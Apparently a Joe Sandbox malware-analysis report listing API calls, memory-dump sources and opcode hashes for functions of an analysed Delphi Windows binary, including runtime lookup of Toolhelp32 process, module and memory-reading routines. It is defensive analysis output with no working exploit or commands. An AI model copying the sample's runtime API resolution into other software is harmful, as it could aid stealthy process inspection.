                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3341692771-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d3f1a7ff4bf156d0d953e89881a5fec61356df3402f95d26b7785939bc046c17
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5C012A260023097EB639699ACE079662CCDF05695F1440A19406D7355E360DC0086B1
                                                                                                                                                                                                                                                                                                                                  Function 02DDC35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • timeSetEvent.WINMM(00002710,00000000,02DDC350,00000000,00000001), ref: 02DDC36C
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Eventtime
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2982266575-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: eefee8da34959ccf4193e6b722564a8eb9a007003d88b57c44de4cdd4ae6f54b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d98a1a512441d74cef6273ec799876eb7fcff95cba77ad776d842d8ea53eb909
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eefee8da34959ccf4193e6b722564a8eb9a007003d88b57c44de4cdd4ae6f54b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3C04CB17A07006BF91156655C92F62669DD705751F100412B705A93C1D1A25C114E64
                                                                                                                                                                                                                                                                                                                                  Function 02DB4C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02DB4C3F
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocString
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2525500382-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5c92a0841c725d2ac54238f137691ca348ed6aa3d67318eacd1d2bcdc1b20e69
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42B09225208201D5EA5A66620E31BF2004C4F40E8BF8400519E6BC8292EA00CC01C835
                                                                                                                                                                                                                                                                                                                                  Function 02DB4C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 02DB4C57
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3341692771-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ce3c9a0a5c178fd9229107eacb1d0e63a01344caf322213119fc1c456583412a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FBA011A88002028A8A0B222800320AE2222AEC0A00B88C0A802020A2028A2A8800AA30
                                                                                                                                                                                                                                                                                                                                  Function 02DB15CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02DB1A03,?,02DB2000), ref: 02DB15E2
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 54b491499dee4b211d5ae4c8f5005ce93bfd00207832992ef8a63e6439095a5e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0bbfc736b3652ab7e494dd687beb3eae56c62c819a1d09fb6d2eb1742772caa9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54b491499dee4b211d5ae4c8f5005ce93bfd00207832992ef8a63e6439095a5e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87F062F0B813008FDB06CFBA99553457BE2EB8A346F50C579D609DB3C4E77184418B10
                                                                                                                                                                                                                                                                                                                                  Function 02DB1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02DB2000), ref: 02DB16A4
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8f7b340c3562b87aa945686db9c3492693a9621e70308811a099a50957b3c0ae
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fb2d5ee0a1a5db47ddc8092dda813f2fc741b4f18c317641c4f3549a128f96c0
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f7b340c3562b87aa945686db9c3492693a9621e70308811a099a50957b3c0ae
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2F090B2A84699BBD7119F6ADC94782BB98FB00315F854139F90897340D770EC50CB98
                                                                                                                                                                                                                                                                                                                                  Function 02DB16E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02DB1704
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 66cba08929cc815761ffd75d4af2b04dc98a4a34dcb69aaa8a22dc2988f85be0
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4494bbadabbbeabfdfefded1810a5a0516ce2fef7285d2e49ee2b1f0ebaf3435
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66cba08929cc815761ffd75d4af2b04dc98a4a34dcb69aaa8a22dc2988f85be0
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47E08C75300311EFEB115A7A9DA4B92ABDCEF48664F244476F64ADB381D2A0EC208B74

                                                                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                                                                  Function 02DCAB1C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02DCADA3,?,?,02DCAE35,00000000,02DCAF11), ref: 02DCAB30
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02DCAB48
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02DCAB5A
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02DCAB6C
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02DCAB7E
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02DCAB90
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02DCABA2
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02DCABB4
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02DCABC6
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02DCABD8
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02DCABEA
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02DCABFC
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02DCAC0E
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02DCAC20
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02DCAC32
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02DCAC44
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02DCAC56
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                                                                  • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 667068680-597814768
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ec111957e5a75dc911eec2850e03d7be93231f6a4852725b7ab1965d2fe12aff
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 00e911867e029e0a24be3cf2193ed738117f3f4c1bc6314c457339e2fbcd43f3
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec111957e5a75dc911eec2850e03d7be93231f6a4852725b7ab1965d2fe12aff
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 643103F2980299AFEF05DFB5E988A5573A9EF09202B500D95A401CF344E674EC90CF61
                                                                                                                                                                                                                                                                                                                                  Function 02DB5908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,02DB737C,02DB0000,02DDE790), ref: 02DB5925
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02DB593C
                                                                                                                                                                                                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,?), ref: 02DB596C
                                                                                                                                                                                                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02DB737C,02DB0000,02DDE790), ref: 02DB59D0
                                                                                                                                                                                                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02DB737C,02DB0000,02DDE790), ref: 02DB5A06
                                                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02DB737C,02DB0000,02DDE790), ref: 02DB5A19
                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DB737C,02DB0000,02DDE790), ref: 02DB5A2B
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DB737C,02DB0000,02DDE790), ref: 02DB5A37
                                                                                                                                                                                                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DB737C,02DB0000), ref: 02DB5A6B
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DB737C), ref: 02DB5A77
                                                                                                                                                                                                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02DB5A99
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                                                                                                                                                                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3245196872-1565342463
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 78e5c38218f0888fbb23fc7bd34f6a9e4c8fc00d083bba69d37f53e4e4362ac2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9de1405e0c6ca2198858a77c5691f4c8015473bbee8dc586e452a23acd5b6e7e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78e5c38218f0888fbb23fc7bd34f6a9e4c8fc00d083bba69d37f53e4e4362ac2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05414B71D00219EBDB12DAA8DCA8ADEB7BDEF09340F4445A5A14AE7341E730EE44CF60
                                                                                                                                                                                                                                                                                                                                  Function 02DB5BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02DB5BE8
                                                                                                                                                                                                                                                                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02DB5BF5
                                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02DB5BFB
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02DB5C26
                                                                                                                                                                                                                                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DB5C6D
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DB5C7D
                                                                                                                                                                                                                                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DB5CA5
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DB5CB5
                                                                                                                                                                                                                                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02DB5CDB
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02DB5CEB
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1599918012-2375825460
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 50c4342d8ddca7047e95a62917f87a5ac0ed4b1371f4808b17fe9d6ac8d44e9a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
